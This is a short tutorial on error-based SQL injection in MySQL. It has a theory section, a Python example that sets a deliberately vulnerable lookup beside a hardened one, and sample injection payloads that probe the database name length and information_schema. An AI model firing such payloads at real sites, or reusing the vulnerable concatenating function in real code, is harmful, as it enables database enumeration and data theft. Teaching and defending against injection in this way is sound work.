Error Based
Theory
Error-based SQLi is an in-band SQL Injection technique that relies on error messages thrown by the database server to obtain information about the structure of the database. In some cases, error-based SQL injection alone is enough for an attacker to enumerate an entire database. While errors are very useful during the development phase of a web application, they should be disabled on a live site, or logged to a file with restricted access instead.
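The mitigation in the paragraph above, as an added example that is not from the original page: a lookup that echoes database errors to the client, next to one that binds the parameter and writes errors to a restricted log file. Python's sqlite3 stands in for MySQL so it runs offline; the table, function names and log path are assumptions.

```python
import logging
import os
import sqlite3
import tempfile

# Constructed sample data; sqlite3 stands in for MySQL so the example runs offline.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
db.execute("INSERT INTO products VALUES (1, 'widget')")

# Error log readable and writable by the service account only (mode 0600).
LOG_PATH = os.path.join(tempfile.mkdtemp(), "db_errors.log")
os.close(os.open(LOG_PATH, os.O_CREAT | os.O_WRONLY, 0o600))
log = logging.getLogger("db_errors")
log.addHandler(logging.FileHandler(LOG_PATH))
log.propagate = False


def lookup_verbose(product_id: str) -> str:
    """Weak: concatenates input into SQL and echoes the database error."""
    try:
        row = db.execute(
            "SELECT name FROM products WHERE id = '" + product_id + "'"
        ).fetchone()
        return row[0] if row else "not found"
    except sqlite3.Error as exc:
        return f"Database error: {exc}"  # error text reaches the client


def lookup_hardened(product_id: str) -> str:
    """Hardened: bound parameter, and errors go to the log, not the response."""
    try:
        row = db.execute(
            "SELECT name FROM products WHERE id = ?", (product_id,)
        ).fetchone()
        return row[0] if row else "not found"
    except sqlite3.Error:
        log.exception("query failed for product_id=%r", product_id)
        return "An internal error occurred."


if __name__ == "__main__":
    for value in ("1", "1'"):
        print(repr(value), "->", lookup_verbose(value), "|", lookup_hardened(value))
```

With the bound parameter, the quote in `1'` is treated as data and no error is raised; the generic message and the log entry cover failures that still occur for other reasons.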
Practice
The process is essentially the same as Boolean Based injection. All you have to do is modify the payloads to trigger an error.
An error-based SQLi payload in MySQL will look like this:
1' SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')--
Examples:
#Boolean Based
1' AND (SELECT LENGTH(database()))=1-- -
#Error Based
1' SELECT IF((SELECT LENGTH(database()))=1,(SELECT table_name FROM information_schema.tables),'a')--